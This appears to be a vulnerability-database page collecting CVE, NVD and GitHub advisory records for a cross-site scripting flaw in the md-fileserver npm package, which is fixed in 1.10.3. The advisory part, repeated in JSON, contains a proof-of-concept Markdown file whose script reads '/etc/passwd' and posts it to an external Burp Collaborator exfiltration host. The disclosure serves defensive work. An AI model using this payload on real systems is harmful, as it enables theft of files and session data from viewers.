CVE-2026-46492 (GCVE-0-2026-46492)
Vulnerability from cvelistv5 – Published: 2026-06-09 16:09 – Updated: 2026-06-09 18:39
VLAI
Title
md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)
Summary
md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including <script> tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3.
Severity
7.2 (High)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/commenthol/md-fileserver/secur… | x_refsource_CONFIRM |
| https://github.com/commenthol/md-fileserver/relea… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| commenthol | md-fileserver |
Affected:
< 1.10.3
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46492",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-09T18:25:03.113474Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T18:39:21.733Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "md-fileserver",
"vendor": "commenthol",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-80",
"description": "CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "CWE-87: Improper Neutralization of Alternate XSS Syntax",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T16:09:29.077Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
},
{
"name": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3"
}
],
"source": {
"advisory": "GHSA-32q2-hhr5-6qvv",
"discovery": "UNKNOWN"
},
"title": "md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46492",
"datePublished": "2026-06-09T16:09:29.077Z",
"dateReserved": "2026-05-14T18:06:06.811Z",
"dateUpdated": "2026-06-09T18:39:21.733Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-46492\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-09T17:17:33.730\",\"lastModified\":\"2026-06-09T20:16:59.300\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-80\"},{\"lang\":\"en\",\"value\":\"CWE-87\"}]}],\"references\":[{\"url\":\"https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46492\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-09T18:25:03.113474Z\"}}}], \"references\": [{\"url\": \"https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-09T18:25:23.273Z\"}}], \"cna\": {\"title\": \"md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)\", \"source\": {\"advisory\": \"GHSA-32q2-hhr5-6qvv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"commenthol\", \"product\": \"md-fileserver\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.10.3\"}]}], \"references\": [{\"url\": \"https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv\", \"name\": \"https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3\", \"name\": \"https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application\\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\\u2014including \u003cscript\u003e tags\\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-80\", \"description\": \"CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-87\", \"description\": \"CWE-87: Improper Neutralization of Alternate XSS Syntax\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-09T16:09:29.077Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46492\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-09T18:39:21.733Z\", \"dateReserved\": \"2026-05-14T18:06:06.811Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-09T16:09:29.077Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46492
Vulnerability from fkie_nvd - Published: 2026-06-09 17:17 - Updated: 2026-06-09 20:16
Severity
Summary
md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including <script> tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "md-fileserver allows for local viewing of markdown files in a browser. Prior to version 1.10.3, a cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain. This issue has been patched in version 1.10.3."
}
],
"id": "CVE-2026-46492",
"lastModified": "2026-06-09T20:16:59.300",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-06-09T17:17:33.730",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-80"
},
{
"lang": "en",
"value": "CWE-87"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-32Q2-HHR5-6QVV
Vulnerability from github – Published: 2026-05-21 17:57 – Updated: 2026-06-09 18:41
VLAI
Summary
md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)
Details
Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.
Details
An attacker can craft malicious Markdown content containing tags or event handlers (e.g., ). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30) The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58) Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it on browser.
View the HTTP request in Burp Collaborator.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to: - Session hijacking - Account takeover - Credential theft - Defacement or injection of malicious content - Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
Severity
7.2 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "md-fileserver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46492"
],
"database_specific": {
"cwe_ids": [
"CWE-80",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-21T17:57:32Z",
"nvd_published_at": "2026-06-09T17:17:33Z",
"severity": "HIGH"
},
"details": "### Summary\nA cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.\n\n### Details\nAn attacker can craft malicious Markdown content containing \u003cscript\u003e tags or event handlers (e.g., \u003cimg onerror=...\u003e). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim\u2019s browser.\n\n### Vulnerable Components\nconfig.js \u2192 markdownIt: { html: true } (Lines 26\u201330)\nThe Markdown renderer is explicitly configured to allow raw HTML.\n\nlib/markd.js (Lines 33\u201358)\nRenders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.\n\nlib/pages/template.html\nThe rendered Markdown is injected into the HTML template using \u003c%= markdown %\u003e without sanitization or output encoding.\n\n### PoC\nCreate a pwn.md \n```\n# Hello\n\n\u003cscript\u003e\n fetch(\u0027/etc/passwd\u0027, { credentials: \u0027include\u0027 })\n .then(r =\u003e r.text())\n .then(t =\u003e fetch(\u0027https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil\u0027, { method: \u0027POST\u0027, body: t }));\n\u003c/script\u003e\n\n```\nOpen it on browser.\n\u003cimg width=\"944\" height=\"238\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cd9e1396-9f4b-4a4b-bc2a-d7530c0c00ac\" /\u003e\nView the HTTP request in Burp Collaborator.\n\u003cimg width=\"1328\" height=\"468\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9faa65ad-73ec-42d0-9ce3-ea78b15294d8\" /\u003e\n\n\n### Impact\nSuccessful exploitation allows an attacker to execute arbitrary JavaScript in the victim\u2019s browser, leading to:\n- Session hijacking\n- Account takeover\n- Credential theft\n- Defacement or injection of malicious content\n- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information\n\nThis affects all users who can view Markdown content within the application.",
"id": "GHSA-32q2-hhr5-6qvv",
"modified": "2026-06-09T18:41:40Z",
"published": "2026-05-21T17:57:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46492"
},
{
"type": "PACKAGE",
"url": "https://github.com/commenthol/md-fileserver"
},
{
"type": "WEB",
"url": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…